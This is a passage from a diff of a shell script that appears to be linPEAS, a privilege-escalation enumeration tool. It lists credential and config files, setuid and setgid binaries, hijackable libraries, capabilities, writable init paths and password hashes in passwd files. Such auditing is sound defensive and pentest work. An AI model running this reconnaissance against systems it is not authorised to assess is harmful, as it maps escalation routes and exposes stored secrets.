then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"web.*\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "web*.config"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wsl.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_OTHER_INTERESTING_FILES" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Other Interesting Files Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bashrc"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".google_authenticator"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hosts.equiv"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.lesshst$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".lesshst"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.lesshst$" | while read f; do ls -ld "$f" | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.plan$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".plan"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.plan$" | while read f; do ls -ld "$f" | sed -${E} "s,\.plan$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.profile$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".profile"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.profile$" | while read f; do ls -ld "$f" | sed -${E} "s,\.profile$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.recently-used\.xbel$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".recently-used.xbel"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.recently-used\.xbel$" | while read f; do ls -ld "$f" | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.rhosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".rhosts"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.rhosts$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".sudo_as_admin_successful"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; +fi + + +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q interesting_files; then +print_title "Interesting Files" +########################################### +#----------) Interesting files (----------# +########################################### + +check_critial_root_path(){ + folder_path="$1" + if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi +} + + + + + + + + +##-- IF) SUID +print_2title "SUID - Check easy privesc, exploits and write perms" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +if ! [ "$STRINGS" ]; then + echo_not_found "strings" +fi +if ! [ "$STRACE" ]; then + echo_not_found "strace" +fi +suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $suids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total"; then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo $s | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" fi fi - done - if [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then - printf $ITALIC - echo "----------------------------------------------------------------------------------------" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH - export LD_LIBRARY_PATH="" - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf $NC - export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH - echo "----------------------------------------------------------------------------------------" - echo "" fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH + echo "----------------------------------------------------------------------------------------" + echo "" fi fi fi fi - done; - echo "" + fi +done; +echo "" - ##-- IF) SGID - print_2title "SGID" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null | while read s; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total";then break; fi +##-- IF) SGID +print_2title "SGID" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $sgids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total";then break; fi - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" - fi + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" fi fi - done - if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf "$ITALIC" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf "$NC" - echo "" fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf "$ITALIC" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf "$NC" + echo "" fi fi fi fi - done; - echo "" + fi +done; +echo "" - ##-- IF) Misconfigured ld.so - print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi - done - echo "" - - ##-- IF) Capabilities - print_2title "Capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - echo "Current capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" - echo "" - echo "Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" - echo "" - echo "Files with capabilities (limited to 50):" - getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break - fi +##-- IF) Misconfigured ld.so +print_2title "Checking misconfigurations of ld.so" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" +printf $ITALIC"/etc/ld.so.conf\n"$NC; +cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" +cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + for f in $fpath/*; do + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi + fi +done +echo "" - if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," +##-- IF) Capabilities +print_2title "Capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +echo "Current capabilities:" +(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" +(cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" +echo "" +echo "Shell capabilities:" +(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" +(cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" +echo "" +echo "Files with capabilities (limited to 50):" +getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break fi done - echo "" + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," + fi - ##-- IF) Users with capabilities + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi +done +echo "" + +##-- IF) Users with capabilities +if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then print_2title "Users with capabilities" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" if [ -f "/etc/security/capability.conf" ]; then @@ -3303,325 +3701,331 @@ if echo $CHECKS | grep -q IntFiles; then else echo_not_found "/etc/security/capability.conf" fi echo "" +fi - ##-- IF) Files with ACLs - print_2title "Files with ACLs (limited to 50)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - - if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - fi - echo "" +##-- IF) Files with ACLs +print_2title "Files with ACLs (limited to 50)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" +( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - ##-- IF) Files with ResourceFork - #if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER - # print_2title "Files with ResourceFork" - # print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" - # find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" - #fi - #echo "" +if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi +echo "" - ##-- IF) .sh files in PATH - print_2title ".sh files in path" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" +##-- IF) Files with ResourceFork +#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER +# print_2title "Files with ResourceFork" +# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" +# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +#fi +#echo "" + +##-- IF) .sh files in PATH +print_2title ".sh files in path" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" +echo $PATH | tr ":" "\n" | while read d; do + for f in $(find "$d" -name "*.sh" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done +done +echo "" + + +broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken) +if [ "$broken_links" ] || [ "$DEBUG" ]; then + print_2title "Broken links in path" echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done + find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; done echo "" +fi - if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" - macosNotSigned /System/Applications - fi - ##-- IF) Unexpected folders in / - print_2title "Unexpected in root" - if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - fi +if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications +fi + +##-- IF) Unexpected folders in / +print_2title "Unexpected in root" +if [ "$MACPEAS" ]; then + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +else + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +fi +echo "" + +##-- IF) Files (scripts) in /etc/profile.d/ +print_2title "Files (scripts) in /etc/profile.d/" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" +if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + check_critial_root_path "/etc/profile" + check_critial_root_path "/etc/profile.d/" +fi +echo "" + + ##-- IF) Files (scripts) in /etc/init.d/ +print_2title "Permissions in init, init.d, systemd, and rc.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" +if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS + check_critial_root_path "/etc/init/" + check_critial_root_path "/etc/init.d/" + check_critial_root_path "/etc/rc.d/init.d" + check_critial_root_path "/usr/local/etc/rc.d" + check_critial_root_path "/etc/rc.d" + check_critial_root_path "/etc/systemd/" + check_critial_root_path "/lib/systemd/" +fi + +echo "" + +##-- IF) Hashes in passwd file +print_list "Hashes inside passwd file? ........... " +if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Writable in passwd file +print_list "Writable passwd file? ................ " +if 